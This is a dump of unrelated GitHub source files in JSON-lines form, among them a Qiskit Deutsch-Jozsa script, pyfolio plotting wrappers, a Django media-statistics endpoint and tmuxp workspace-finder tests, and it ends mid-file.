color=self._colors['CONSTRAINT'], close=False)\n self._handler.draw_poly(((x1+2, y1), (x1-4, y1+4), (x1-4, y1-4)),\n fillcolor=self._colors['CONSTRAINT'],\n close=True)\n","repo_name":"gurneyalex/projman","sub_path":"renderers/gantt.py","file_name":"gantt.py","file_ext":"py","file_size_in_byte":16368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28761034662","text":"# Порахувати суму елементів списку, якщо у списку виникає елемент словник то в сумму добавити сумму числових елементів items словника\nclass MyErr(Exception):\n def __init__(self,*args):\n if args:\n self.message= args[0]\n else:\n self.message=None\n\n def __str__(self):\n if self.message:\n return 'MyErr ,{0}'.format(self.message)\n else:\n return 'MyErr has been raised!'\n\n def fix(d):\n s=0\n for i in d:\n if isinstance(d[i],int) or isinstance(d[i],float):\n s=s+d[i]\n return s\n\n\ndef sum(a):\n s=0\n for i in a:\n try:\n if isinstance(i,dict):\n raise MyErr\n else:\n s=s+i\n except TypeError:\n print(\"Виникла помилка невідповідності типів даних\")\n except MyErr:\n s=s+MyErr.fix(i)\n except Exception as e:\n print(\"Виникла непередбачувана помилка \",e)\n else:\n continue\n return s\n\n\n\na=[1,2,3,45,12.3,{1:\"Січень\",2:\"Лютий\",3:\"Березень\",4:13.5},-12.2,{5:\"Травень\",6:15,7:28,8:35,9:\"Вересень\",10:\"Жовтень\",11:\"Листопад\",12:\"Грудень\"},4,8]\nprint(sum(a))","repo_name":"SharovarovAleksandr/Academy","sub_path":"Lesson10/Lesson10_3.py","file_name":"Lesson10_3.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27570489168","text":"import numpy as np\n\nfrom qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister\nfrom qiskit.visualization import plot_histogram\nfrom typing import *\nfrom pprint import pprint\nfrom math import log2\nfrom qiskit.test.mock import FakeVigo\nfrom qiskit import transpile\n\n\ndef build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:\n # implement the oracle O_f\n # NOTE: use multi_control_toffoli_gate ('noancilla' mode)\n # https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html\n # https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates\n # https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate\n controls = QuantumRegister(n, \"ofc\")\n target = QuantumRegister(1, \"oft\")\n oracle = QuantumCircuit(controls, target, name=\"Of\")\n for i in range(2 ** n):\n rep = np.binary_repr(i, n)\n if f(rep) == \"1\":\n for j in range(n):\n if rep[j] == \"0\":\n oracle.x(controls[j])\n oracle.mct(controls, target[0], None, mode='noancilla')\n for j in range(n):\n if rep[j] == \"0\":\n oracle.x(controls[j])\n # oracle.barrier()\n # oracle.draw('mpl', filename='circuit/deutsch-oracle.png')\n return oracle\n\n\ndef build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:\n # implement the Deutsch-Jozsa circuit\n\n # initial n + 1 bits\n controls = QuantumRegister(n, \"qc\")\n target = QuantumRegister(1, \"qt\")\n classicals = ClassicalRegister(n, \"qm\")\n prog = QuantumCircuit(controls, target, classicals)\n\n # inverse last one (can be omitted if using O_f^\\pm)\n prog.x(target)\n\n # apply H to get superposition\n for i in range(n):\n prog.h(controls[i])\n prog.h(target)\n prog.barrier()\n\n # apply oracle O_f\n oracle = build_oracle(n, f)\n prog.append(\n oracle.to_gate(),\n [controls[i] for i in range(n)] + [target])\n\n # apply H back (QFT on Z_2^n)\n for i in range(n):\n prog.h(controls[i])\n prog.barrier()\n\n # measure\n for i in range(n):\n prog.measure(controls[i], classicals[i])\n\n return prog\n\n\ndef get_statevector(prog: QuantumCircuit) -> Any:\n state_backend = Aer.get_backend('statevector_simulator')\n statevec = execute(prog, state_backend).result()\n quantum_state = statevec.get_statevector()\n qubits = round(log2(len(quantum_state)))\n quantum_state = {\n \"|\" + np.binary_repr(i, qubits) + \">\": quantum_state[i]\n for i in range(2 ** qubits)\n }\n return quantum_state\n\n\ndef evaluate(backend_str: str, prog: QuantumCircuit, shots: int) -> Any:\n # Q: which backend should we use?\n\n # get state vector\n quantum_state = get_statevector(prog)\n\n # get simulate results\n backend = Aer.get_backend(backend_str)\n results = execute(prog, backend, shots=shots).result()\n counts = results.get_counts()\n is_constant = np.binary_repr(0, n) in counts.keys()\n\n return {\n \"measurements\": counts,\n # \"state\": statevec,\n \"quantum_state\": quantum_state,\n \"is_constant\": is_constant\n }\n\n\ndef deutsch_test_1(rep: str):\n \"\"\"constant function.\"\"\"\n return \"1\"\n\n\ndef deutsch_test_2(rep: str):\n \"\"\"constant function.\"\"\"\n return \"0\"\n\n\ndef deutsch_test_3(rep: str):\n \"\"\"balanced function.\"\"\"\n return \"1\" if rep[0:2] == \"01\" or rep[0:2] == \"10\" else \"0\"\n\n\nif __name__ == \"__main__\":\n n = 2\n f = lambda rep: rep[-1]\n # f = lambda rep: \"1\" if rep[0:2] == \"01\" or rep[0:2] == \"10\" else \"0\"\n # f = lambda rep: \"0\"\n prog = build_circuit(n, f)\n sample_shot = 6000\n # prog.draw('mpl', filename='circuit/deutsch.png')\n backend = FakeVigo()\n circuit1 = transpile(prog, backend, optimization_level=2)\n print(circuit1.__len__())\n circuit1.h(qubit=2)\n circuit1.x(qubit=3)\n circuit1.measure_all()\n info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()\n\n writefile = open(\"startQiskit0.csv\", \"w\")\n print(info, file=writefile)\n print(\"results end\", file=writefile)\n print(circuit1.depth(), file=writefile)\n print(circuit1, file=writefile)\n writefile.close()","repo_name":"wjy99-c/QDiff","sub_path":"data/p2DJ/startQiskit0.py","file_name":"startQiskit0.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"27576186584","text":"#!/bin/python3\n\nimport sys\n\n# https://www.hackerrank.com/challenges/plus-minus\n\nn = int(input().strip())\narr = [int(arr_temp) for arr_temp in input().strip().split(' ')]\nnumberArray = [0,0,0] # positive, negative, zero\nfor number in arr:\n if number > 0:\n numberArray[0] = numberArray[0] + 1\n elif number < 0:\n numberArray[1] = numberArray[1] + 1\n else:\n numberArray[2] = numberArray[2] + 1\n\nfor item in numberArray:\n print('{0:16f}'.format(item / n).strip())\n","repo_name":"EinarLogi/pythonExercises","sub_path":"PlusMinus.py","file_name":"PlusMinus.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3045939399","text":"''' program to take input from user and print the phrase after calculating\r\n the frequency of words and their grammer related information'''\r\n\r\n\r\n\r\n# -----------------------import area-------------------------\r\n\r\n#natural language toolkit package provided by mit \r\nimport nltk\r\nfrom nltk.book import *\r\n\r\n#package used for numerical computations in python\r\n#(numpy- numerical python )\r\nimport numpy\r\n\r\n#------------------------import area ends---------------------\r\n\r\n\r\n#function to tokenize the entered phrase\r\n\r\ndef tokenizing():\r\n check =False\r\n while(check == False):\r\n print(\"****************\")\r\n print(\" Enter Your Choice:\")\r\n print(\"****************\")\r\n print(\"1.Enter Text For Analysis\")\r\n print(\"2.Find Frequency Of Words\")\r\n print(\"3.Lexical Distribution\")\r\n print(\"4.Exit\")\r\n print(\"****************\")\r\n x = int(input())\r\n if (x ==1):\r\n enterText()\r\n elif (x==2):\r\n frequency()\r\n elif(x==3):\r\n lexicalDistribution()\r\n else:\r\n check = True\r\n\r\n\r\n#function to get user input in text\r\n#and write it on a file named a.txt\r\n\r\ndef enterText():\r\n s = input(\"enter your text:\"+\"\\n\")\r\n f = open(\"a.txt\",\"r+\")\r\n f.write(s)\r\n f.close()\r\n\r\n\r\n#function to create the distribution table regarding\r\n#frequency of letters in a phrase\r\n\r\ndef frequency():\r\n f = open(\"a.txt\",\"r+\")\r\n x = f.read()\r\n token = nltk.word_tokenize(x)\r\n freq= FreqDist(token)\r\n freq.tabulate()\r\n\r\n\r\n\r\n#function that prints the lexical distribution\r\n#table of the tokenized words\r\n\r\ndef lexicalDistribution():\r\n f = open (\"a.txt\",\"r+\")\r\n x = f.read()\r\n text = nltk.word_tokenize(x)\r\n x = nltk.pos_tag(text)\r\n print(x)\r\n\r\n","repo_name":"skp-github/utility-","sub_path":"NLP.py","file_name":"NLP.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5475068665","text":"import empyrical as ep\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport pyfolio as pf\n\ndef create_simple_tear_sheet(returns,\n positions=None,\n transactions=None,\n benchmark_rets=None,\n slippage=None,\n estimate_intraday='infer',\n live_start_date=None,\n turnover_denom='AGB',\n header_rows=None,\n file_name=None):\n \"\"\"\n A clone of pyfolio function with additional export file_name argument.\n For documentation and arguments see pyfolio.create_simple_tear_sheet(...).\n \"\"\"\n\n positions = pf.utils.check_intraday(estimate_intraday, returns,\n positions, transactions)\n\n if (slippage is not None) and (transactions is not None):\n returns = txn.adjust_returns_for_slippage(returns, positions,\n transactions, slippage)\n\n always_sections = 4\n positions_sections = 4 if positions is not None else 0\n transactions_sections = 2 if transactions is not None else 0\n live_sections = 1 if live_start_date is not None else 0\n benchmark_sections = 1 if benchmark_rets is not None else 0\n\n vertical_sections = sum([\n always_sections,\n positions_sections,\n transactions_sections,\n live_sections,\n benchmark_sections,\n ])\n\n if live_start_date is not None:\n live_start_date = ep.utils.get_utc_timestamp(live_start_date)\n\n pf.plotting.show_perf_stats(returns,\n benchmark_rets,\n positions=positions,\n transactions=transactions,\n turnover_denom=turnover_denom,\n live_start_date=live_start_date,\n header_rows=header_rows)\n\n fig = plt.figure(figsize=(14, vertical_sections * 6))\n gs = gridspec.GridSpec(vertical_sections, 3, wspace=0.5, hspace=0.5)\n\n ax_rolling_returns = plt.subplot(gs[:2, :])\n i = 2\n if benchmark_rets is not None:\n ax_rolling_beta = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n ax_rolling_sharpe = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n ax_underwater = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n\n pf.plotting.plot_rolling_returns(returns,\n factor_returns=benchmark_rets,\n live_start_date=live_start_date,\n cone_std=(1.0, 1.5, 2.0),\n ax=ax_rolling_returns)\n ax_rolling_returns.set_title('Cumulative returns')\n\n if benchmark_rets is not None:\n pf.plotting.plot_rolling_beta(returns, benchmark_rets, ax=ax_rolling_beta)\n\n pf.plotting.plot_rolling_sharpe(returns, ax=ax_rolling_sharpe)\n\n pf.plotting.plot_drawdown_underwater(returns, ax=ax_underwater)\n\n if positions is not None:\n # Plot simple positions tear sheet\n ax_exposures = plt.subplot(gs[i, :])\n i += 1\n ax_top_positions = plt.subplot(gs[i, :], sharex=ax_exposures)\n i += 1\n ax_holdings = plt.subplot(gs[i, :], sharex=ax_exposures)\n i += 1\n ax_long_short_holdings = plt.subplot(gs[i, :])\n i += 1\n\n positions_alloc = pf.pos.get_percent_alloc(positions)\n\n pf.plotting.plot_exposures(returns, positions, ax=ax_exposures)\n\n pf.plotting.show_and_plot_top_positions(returns,\n positions_alloc,\n show_and_plot=0,\n hide_positions=False,\n ax=ax_top_positions)\n\n pf.plotting.plot_holdings(returns, positions_alloc, ax=ax_holdings)\n\n pf.plotting.plot_long_short_holdings(returns, positions_alloc,\n ax=ax_long_short_holdings)\n\n if transactions is not None:\n # Plot simple transactions tear sheet\n ax_turnover = plt.subplot(gs[i, :])\n i += 1\n ax_txn_timings = plt.subplot(gs[i, :])\n i += 1\n\n pf.plotting.plot_turnover(returns,\n transactions,\n positions,\n ax=ax_turnover)\n\n pf.plotting.plot_txn_time_hist(transactions, ax=ax_txn_timings)\n\n for ax in fig.axes:\n plt.setp(ax.get_xticklabels(), visible=True)\n\n # fig.tight_layout()\n if file_name:\n fig.savefig(file_name)\n else:\n plt.show()\n plt.close(fig)\n\n\ndef create_returns_tear_sheet(returns, positions=None,\n transactions=None,\n live_start_date=None,\n cone_std=(1.0, 1.5, 2.0),\n benchmark_rets=None,\n bootstrap=False,\n turnover_denom='AGB',\n header_rows=None,\n file_name=None):\n \"\"\"\n A clone of pyfolio function with additional export file_name argument.\n For documentation and arguments see pyfolio.create_returns_tear_sheet(...).\n \"\"\"\n\n if benchmark_rets is not None:\n returns = pf.utils.clip_returns_to_benchmark(returns, benchmark_rets)\n\n pf.plotting.show_perf_stats(returns, benchmark_rets,\n positions=positions,\n transactions=transactions,\n turnover_denom=turnover_denom,\n bootstrap=bootstrap,\n live_start_date=live_start_date,\n header_rows=header_rows)\n\n pf.plotting.show_worst_drawdown_periods(returns)\n\n vertical_sections = 11\n\n if live_start_date is not None:\n vertical_sections += 1\n live_start_date = ep.utils.get_utc_timestamp(live_start_date)\n\n if benchmark_rets is not None:\n vertical_sections += 1\n\n if bootstrap:\n vertical_sections += 1\n\n fig = plt.figure(figsize=(14, vertical_sections * 6))\n gs = gridspec.GridSpec(vertical_sections, 3, wspace=0.5, hspace=0.5)\n ax_rolling_returns = plt.subplot(gs[:2, :])\n\n i = 2\n ax_rolling_returns_vol_match = plt.subplot(gs[i, :],\n sharex=ax_rolling_returns)\n i += 1\n ax_rolling_returns_log = plt.subplot(gs[i, :],\n sharex=ax_rolling_returns)\n i += 1\n ax_returns = plt.subplot(gs[i, :],\n sharex=ax_rolling_returns)\n i += 1\n if benchmark_rets is not None:\n ax_rolling_beta = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n ax_rolling_volatility = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n ax_rolling_sharpe = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n ax_drawdown = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n ax_underwater = plt.subplot(gs[i, :], sharex=ax_rolling_returns)\n i += 1\n ax_monthly_heatmap = plt.subplot(gs[i, 0])\n ax_annual_returns = plt.subplot(gs[i, 1])\n ax_monthly_dist = plt.subplot(gs[i, 2])\n i += 1\n ax_return_quantiles = plt.subplot(gs[i, :])\n i += 1\n\n pf.plotting.plot_rolling_returns(\n returns,\n factor_returns=benchmark_rets,\n live_start_date=live_start_date,\n cone_std=cone_std,\n ax=ax_rolling_returns)\n ax_rolling_returns.set_title(\n 'Cumulative returns')\n\n pf.plotting.plot_rolling_returns(\n returns,\n factor_returns=benchmark_rets,\n live_start_date=live_start_date,\n cone_std=None,\n volatility_match=(benchmark_rets is not None),\n legend_loc=None,\n ax=ax_rolling_returns_vol_match)\n ax_rolling_returns_vol_match.set_title(\n 'Cumulative returns volatility matched to benchmark')\n\n pf.plotting.plot_rolling_returns(\n returns,\n factor_returns=benchmark_rets,\n logy=True,\n live_start_date=live_start_date,\n cone_std=cone_std,\n ax=ax_rolling_returns_log)\n ax_rolling_returns_log.set_title(\n 'Cumulative returns on logarithmic scale')\n\n pf.plotting.plot_returns(\n returns,\n live_start_date=live_start_date,\n ax=ax_returns,\n )\n ax_returns.set_title(\n 'Returns')\n\n if benchmark_rets is not None:\n pf.plotting.plot_rolling_beta(\n returns, benchmark_rets, ax=ax_rolling_beta)\n\n pf.plotting.plot_rolling_volatility(\n returns, factor_returns=benchmark_rets, ax=ax_rolling_volatility)\n\n pf.plotting.plot_rolling_sharpe(\n returns, ax=ax_rolling_sharpe)\n\n # Drawdowns\n pf.plotting.plot_drawdown_periods(\n returns, top=5, ax=ax_drawdown)\n\n pf.plotting.plot_drawdown_underwater(\n returns=returns, ax=ax_underwater)\n\n pf.plotting.plot_monthly_returns_heatmap(returns, ax=ax_monthly_heatmap)\n pf.plotting.plot_annual_returns(returns, ax=ax_annual_returns)\n pf.plotting.plot_monthly_returns_dist(returns, ax=ax_monthly_dist)\n\n pf.plotting.plot_return_quantiles(\n returns,\n live_start_date=live_start_date,\n ax=ax_return_quantiles)\n\n if bootstrap and benchmark_rets is not None:\n ax_bootstrap = plt.subplot(gs[i, :])\n pf.plotting.plot_perf_stats(returns, benchmark_rets,\n ax=ax_bootstrap)\n elif bootstrap:\n raise ValueError('bootstrap requires passing of benchmark_rets.')\n\n for ax in fig.axes:\n plt.setp(ax.get_xticklabels(), visible=True)\n\n if file_name:\n fig.savefig(file_name)\n else:\n plt.show()\n plt.close(fig)\n","repo_name":"kafana/thinkering","sub_path":"trading/kftools/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":10066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28037570100","text":"import logging\nfrom collections import defaultdict\n\nfrom django.db.models import Sum, Avg, Count\nfrom django.db.models import Func, F\nfrom django.db.models.functions import Cast\nfrom django.contrib.gis.db.models import BigIntegerField\n\nfrom ..models import Media\nfrom ..search import TatorSearch\nfrom ..schema import MediaStatsSchema\n\nfrom ._media_query import get_media_queryset\n\nfrom ._base_views import BaseDetailView\nfrom ._permissions import ProjectViewOnlyPermission\n\nlogger = logging.getLogger(__name__)\n\n\nclass MediaStatsAPI(BaseDetailView):\n \"\"\"Count, download size, and total size of a media list.\n\n This endpoint accepts the same query parameters as a GET request to the `Medias` endpoint,\n but only returns statistics about the media.\n \"\"\"\n\n schema = MediaStatsSchema()\n permission_classes = [ProjectViewOnlyPermission]\n http_method_names = [\"get\"]\n\n def _get(self, params):\n qs = get_media_queryset(params[\"project\"], params)\n # Count\n # Download size\n # total_size\n # duration\n duration = 0\n total_size = 0\n\n # Run aggregations\n agg = qs.filter(type__dtype=\"video\").aggregate(\n total_frames=Sum(\"num_frames\"), total_fps=Sum(\"fps\")\n )\n\n extracted = qs.annotate(\n image=Func(F(\"media_files__image\"), function=\"jsonb_array_elements\"),\n streaming=Func(F(\"media_files__streaming\"), function=\"jsonb_array_elements\"),\n thumbnail_gif=Func(F(\"media_files__thumbnail_gif\"), function=\"jsonb_array_elements\"),\n thumbnail=Func(F(\"media_files__thumbnail\"), function=\"jsonb_array_elements\"),\n archival=Func(F(\"media_files__archival\"), function=\"jsonb_array_elements\"),\n attachment=Func(F(\"media_files__attachment\"), function=\"jsonb_array_elements\"),\n )\n type_agg = extracted.aggregate(\n image_size=Sum(Cast(\"image__size\", BigIntegerField())),\n streaming_size=Sum(Cast(\"streaming__size\", BigIntegerField())),\n thumbnail_gif_size=Sum(Cast(\"thumbnail_gif__size\", BigIntegerField())),\n thumbnail_size=Sum(Cast(\"thumbnail__size\", BigIntegerField())),\n archival_size=Sum(Cast(\"archival__size\", BigIntegerField())),\n attachment_size=Sum(Cast(\"attachment__size\", BigIntegerField())),\n )\n logger.info(type_agg)\n for k in type_agg.keys():\n if type_agg[k]:\n total_size += type_agg[k]\n\n num_vids = qs.filter(type__dtype=\"video\").count()\n if num_vids > 0:\n avg_fps = agg[\"total_fps\"] / num_vids\n duration = agg[\"total_frames\"] / avg_fps\n\n response_data = {\n \"count\": qs.count(),\n \"duration\": duration,\n \"total_size\": total_size,\n \"download_size\": total_size,\n }\n\n return response_data\n","repo_name":"cvisionai/tator","sub_path":"api/main/rest/media_stats.py","file_name":"media_stats.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"15973140586","text":"# 安慰奶牛 题解的思路是采用最小生成树的策略\n# 这道题目其实本质上就是要对每条路的权值进行一定的处理,将每个条边的两个端点的权重也算进去\nvis = []\ndef main():\n n, m = map(int, input().split())\n l = []\n for i in range(n):\n k = input()\n l.append(int(k))\n vis.append(i)\n dic = []\n for _ in range(m):\n a, b, k = map(int, input().split())\n k = l[a-1] + l[b-1] + 2 * k\n tmp = []\n tmp.append(a-1)\n tmp.append(b-1)\n tmp.append(k)\n dic.append(tmp)\n # 需要对最小的点进行判断,找到最小的点作为过夜的地点\n min = l[0]\n for i in range(1, n):\n if min > l[i]:\n min = l[i]\n # 进行最小生成树的算法\n minRes = min + Kruscal(dic)\n print(minRes)\n\n\ndef Kruscal(dic):\n ans = 0\n dic.sort(key=(lambda x:x[2]))\n # print(dic)\n for i in range(len(dic)):\n x = find(dic[i][0])\n y = find(dic[i][1])\n # print(x,y)\n if x != y:\n getUnit(x, y)\n ans = ans + dic[i][2]\n return ans\n\n\n# 用来寻找这个节点的根节点的函数\ndef find(x: int):\n while vis[x] != x:\n x = vis[x]\n return x\n\n\n# 用来将两个不是一样的树的根节点变成一样的办法\ndef getUnit(x, y):\n vis[y] = x\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"royal-dargon/Leetcode","sub_path":"practice_py/蓝桥杯py训练/algorithm training/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73521722084","text":"\"\"\"\n Proszę napisać funkcję, która dla podanej listy odsyłaczowej odwraca\nkolejność jej elementów.\n\"\"\"\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\ndef reverse(first):\n p = None\n q = first\n while q != None:\n r = q.next\n q.next = p\n p = q\n q = r\n\n return p \n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/wdi/zad4 zestaw 7.py","file_name":"zad4 zestaw 7.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25467565621","text":"from django.contrib import admin\nfrom easy_select2 import select2_modelform\n\nfrom api.models import SoftwareHouse, Employee\n\n\n@admin.register(SoftwareHouse)\nclass SoftwareHouseAdmin(admin.ModelAdmin):\n form = select2_modelform(SoftwareHouse, attrs={'width': '250px'})\n list_display = [\"id\", \"name\", \"about\"]\n search_fields = [\"name\"]\n list_filter = [\"name\"]\n\n\n@admin.register(Employee)\nclass EmployeeAdmin(admin.ModelAdmin):\n form = select2_modelform(Employee, attrs={'width': '250px'})\n list_display = [\"id\", \"first_name\", \"last_name\", \"software_house\", \"designation\", \"email\", \"birth_date\"]\n search_fields = [\"first_name\", \"last_name\"]\n list_filter = [\"first_name\", \"last_name\", \"software_house\", \"designation\", \"email\", \"birth_date\"]\n","repo_name":"AliIqbal28/zweidevsfirstapp","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73432101924","text":"registers = {}\noperations = []\n\nlastfrekvency = 0\n\ndef sndX(X, unused):\n global lastfrekvency\n lastfrekvency = registers[X]\n #print(\"sndX {}\".format(X))\n return 1\n\ndef setX(X,Y):\n global registers\n registers[X] = Y if not str(Y).isalpha() else registers.get(Y, 0)\n #print(\"setX {} {}\".format(X,Y))\n return 1\n\ndef addX(X,Y):\n global registers\n registers[X] = registers.get(X, 0) + (Y if not str(Y).isalpha() else registers.get(Y, 0))\n #print(\"addX {} {}\".format(X,Y))\n return 1\n\ndef mulX(X,Y):\n global registers\n registers[X] = registers.get(X, 0) * (Y if not str(Y).isalpha() else registers.get(Y, 0))\n #print(\"mulX {} {}\".format(X,Y))\n return 1\n\ndef modX(X,Y):\n global registers\n registers[X] = registers.get(X, 0) % (Y if not str(Y).isalpha() else registers.get(Y, 0))\n #print(\"modX {} {}\".format(X,Y))\n return 1\n\ndef rcvX(X, unused):\n if registers.get(X,0) > 0:\n print(\"last frekvency {}\".format(lastfrekvency))\n quit()\n return 1\n\n\ndef jgzX(X,Y):\n if registers.get(X,0) > 0:\n return Y if not str(Y).isalpha() else registers.get(Y, 0)\n return 1\n\ncommands = {\n \"snd\": sndX,\n \"set\": setX,\n \"add\": addX,\n \"mul\": mulX,\n \"mod\": modX,\n \"rcv\": rcvX,\n \"jgz\": jgzX\n}\n\ndef createLambda(command_name, x, y):\n return lambda : commands[command_name](x,y)\n\nwith open(\"input.txt\") as fp:\n for line in fp:\n splitted_line = line.strip().split()\n cmd = splitted_line[0]\n register_name = splitted_line[1]\n cmd_value = 1\n if len(splitted_line) == 3:\n cmd_value = splitted_line[2]\n if not splitted_line[2].isalpha():\n cmd_value = int(splitted_line[2])\n\n operations.append(createLambda(cmd, register_name, cmd_value))\n\ncurrentPosition = 0\nprint(\"Starting...\")\nwhile True:\n currentPosition += operations[currentPosition]()\n","repo_name":"bgalamb/adventofcode","sub_path":"2017/18/duet.py","file_name":"duet.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35629893172","text":"import os\nimport time\nfrom multiprocessing import Process\n\n\nclass SubProcess(Process):\n def __init__(self, name_):\n self.__name = name_\n super().__init__()\n\n def run(self):\n print(f'这里是子进程{self.__name}')\n time.sleep(20)\n\n\nif __name__ == '__main__':\n subp_A = SubProcess('A')\n subp_B = SubProcess('B')\n subp_A.start()\n subp_B.start()\n print(f'这里是父进程,进程ID为 {os.getpid()}')\n print(f'子进程A的ID为 {subp_A.pid}')\n print(f'子进程B的ID为 {subp_B.pid}')\n subp_A.join()\n subp_B.join()\n","repo_name":"hitlic/python_book","sub_path":"codes/chapter-10/eg_10-06.py","file_name":"eg_10-06.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"52"} +{"seq_id":"27615067757","text":"import argparse\nimport pathlib\nimport typing as t\n\nimport pytest\n\nfrom tmuxp import cli\nfrom tmuxp.cli.utils import tmuxp_echo\nfrom tmuxp.workspace.finders import (\n find_workspace_file,\n get_workspace_dir,\n in_cwd,\n in_dir,\n is_pure_name,\n)\n\nif t.TYPE_CHECKING:\n import _pytest.capture\n\n\ndef test_in_dir_from_config_dir(tmp_path: pathlib.Path) -> None:\n \"\"\"config.in_dir() finds configs config dir.\"\"\"\n\n cli.startup(tmp_path)\n yaml_config = tmp_path / \"myconfig.yaml\"\n yaml_config.touch()\n json_config = tmp_path / \"myconfig.json\"\n json_config.touch()\n configs_found = in_dir(tmp_path)\n\n assert len(configs_found) == 2\n\n\ndef test_ignore_non_configs_from_current_dir(tmp_path: pathlib.Path) -> None:\n \"\"\"cli.in_dir() ignore non-config from config dir.\"\"\"\n\n cli.startup(tmp_path)\n\n junk_config = tmp_path / \"myconfig.psd\"\n junk_config.touch()\n conf = tmp_path / \"watmyconfig.json\"\n conf.touch()\n configs_found = in_dir(tmp_path)\n assert len(configs_found) == 1\n\n\ndef test_get_configs_cwd(\n tmp_path: pathlib.Path, monkeypatch: pytest.MonkeyPatch\n) -> None:\n \"\"\"config.in_cwd() find config in shell current working directory.\"\"\"\n\n confdir = tmp_path / \"tmuxpconf2\"\n confdir.mkdir()\n\n monkeypatch.chdir(confdir)\n with pathlib.Path(\".tmuxp.json\").open(\"w+b\") as config1:\n config1.close()\n\n configs_found = in_cwd()\n assert len(configs_found) == 1\n assert \".tmuxp.json\" in configs_found\n\n\n@pytest.mark.parametrize(\n \"path,expect\",\n [\n (\".\", False),\n (\"./\", False),\n (\"\", False),\n (\".tmuxp.yaml\", False),\n (\"../.tmuxp.yaml\", False),\n (\"../\", False),\n (\"/hello/world\", False),\n (\"~/.tmuxp/hey\", False),\n (\"~/work/c/tmux/\", False),\n (\"~/work/c/tmux/.tmuxp.yaml\", False),\n (\"myproject\", True),\n ],\n)\ndef test_is_pure_name(path: str, expect: bool) -> None:\n assert is_pure_name(path) == expect\n\n\ndef test_tmuxp_configdir_env_var(\n tmp_path: pathlib.Path, monkeypatch: pytest.MonkeyPatch\n) -> None:\n monkeypatch.setenv(\"TMUXP_CONFIGDIR\", str(tmp_path))\n\n assert get_workspace_dir() == str(tmp_path)\n\n\ndef test_tmuxp_configdir_xdg_config_dir(\n tmp_path: pathlib.Path, monkeypatch: pytest.MonkeyPatch\n) -> None:\n monkeypatch.setenv(\"XDG_CONFIG_HOME\", str(tmp_path))\n tmux_dir = tmp_path / \"tmuxp\"\n tmux_dir.mkdir()\n\n assert get_workspace_dir() == str(tmux_dir)\n\n\n@pytest.fixture\ndef homedir(tmp_path: pathlib.Path) -> pathlib.Path:\n home = tmp_path / \"home\"\n home.mkdir()\n return home\n\n\n@pytest.fixture\ndef configdir(homedir: pathlib.Path) -> pathlib.Path:\n conf = homedir / \".tmuxp\"\n conf.mkdir()\n return conf\n\n\n@pytest.fixture\ndef projectdir(homedir: pathlib.Path) -> pathlib.Path:\n proj = homedir / \"work\" / \"project\"\n proj.mkdir(parents=True)\n return proj\n\n\ndef test_resolve_dot(\n tmp_path: pathlib.Path,\n homedir: pathlib.Path,\n configdir: pathlib.Path,\n projectdir: pathlib.Path,\n monkeypatch: pytest.MonkeyPatch,\n) -> None:\n monkeypatch.setenv(\"HOME\", str(homedir))\n monkeypatch.setenv(\"XDG_CONFIG_HOME\", str(homedir / \".config\"))\n\n tmuxp_conf_path = projectdir / \".tmuxp.yaml\"\n tmuxp_conf_path.touch()\n user_config_name = \"myconfig\"\n user_config = configdir / f\"{user_config_name}.yaml\"\n user_config.touch()\n\n project_config = tmuxp_conf_path\n\n monkeypatch.chdir(projectdir)\n\n expect = str(project_config)\n assert find_workspace_file(\".\") == expect\n assert find_workspace_file(\"./\") == expect\n assert find_workspace_file(\"\") == expect\n assert find_workspace_file(\"../project\") == expect\n assert find_workspace_file(\"../project/\") == expect\n assert find_workspace_file(\".tmuxp.yaml\") == expect\n assert find_workspace_file(\"../../.tmuxp/%s.yaml\" % user_config_name) == str(\n 